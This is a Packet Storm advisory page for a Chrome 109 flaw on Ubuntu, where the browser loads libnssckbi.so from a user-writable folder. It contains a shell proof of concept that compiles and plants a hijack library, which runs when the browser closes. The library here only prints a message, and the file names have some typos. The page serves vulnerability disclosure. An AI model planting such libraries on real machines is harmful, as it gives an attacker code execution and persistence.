exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Google Chrome 109.0.5414.74 Unsafe Library Load

Google Chrome 109.0.5414.74 Unsafe Library Load
Posted Mar 27, 2023
Authored by Rafay Baloch, Muhammad Samak

Google Chrome version 109.0.5414.74 on Ubuntu attempts to load libnssckbi.so from a user-writable location and if missing, a replacement piece of malware can be used by an attacker to achieve code execution. Although privilege escalation is not likely as an attacker would already need access to the user's privilege level to place the malware, it could be a target for other malicious software leaving backdoors for persistence.

tags | exploit, code execution
systems | linux, ubuntu
SHA-256 | f717eb6fe35e231271a4dd4e77bba5c4985b8a2f9c10d2fb10a342b7a8064b5a

Google Chrome 109.0.5414.74 Unsafe Library Load

Change Mirror Download
#Vulnerability: Google Chrome code execution via missing lib file (Ubuntu)
Product: Google Chrome
Discovered by: Rafay Baloch and Muhammad Samak
#Version: 109.0.5414.74
#Impact: Moderate
#Company: Cyber Citadel
#Website: https://www.cybercitadel.com
#Tested-on : Ubuntu 22.04.1

*Description*

Google chrome attempts to load the 'libssckbi.so' file from a user-writable location.
PATH: /home/$username/.pki/nssdb/libnssckbi.so
Since the Shared Library 'ibnssckbi.so' specified path is writeable.
It is possible to achieve the Code Execution by placing the malicious file with
the name `libnssckbi.so` in the specified path.



*exploit*

Following is the POC that could be used to reproduce the issue:

echo "\n\t\t\tGoogle-Chrome Shared Library Code Execution..."
echo "[*] Checking /.pki/nssdb PATH"
if [ -d "/home/haalim/.pki/nssdb" ]
then

echo "[+] Directory Exists..."
if [ -w "/home/haalim/.pki/nssdb" ]
then
echo "[+] Directory is writable..."

echo "[+] Directory is writable..."
echo "[+] Generating malicious File libnssckbi.so ..."
echo "#define _GNU_SOURCE" > /home/haalim/.pki/nssdb/exploit.c
echo "#include <unistd.h>" >> /home/haalim/.pki/nssdb/exploit.c
echo "#include <stdio.h>" >> /home/haalim/.pki/nssdb/exploit.c
echo "#include <stdlib.h>" >> /home/haalim/.pki/nssdb/exploit.c
echo "void f() {" >> /home/haalim/.pki/nssdb/exploit.c
echo 'printf("Code Executed............ TMGM :)\n");' >> /home/haalim/.pki/nssdb/exploit.c
echo "}" >> /home/haalim/.pki/nssdb/exploit.c
gcc -c -Wall -Werror -fpic /home/haalim/.pki/nssdb/exploit.c -o /home/haalim/.pki/nssdb/exploit.o
gcc -shared -o /home/haalim/.pki/nssdb/libnssckbi.so -Wl,-init,f /home/haalim/.pki/nssdb/exploit.o


fi

fi

Upon closing the browser windows, the application executes the malicious code


*Impact*

The attacker can use this behavior to bypass the application whitelisting rules.
This behavior can also lead to DoS attacks.
An attacker can trick a victim into supplying credentials by creating a fake prompt.
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close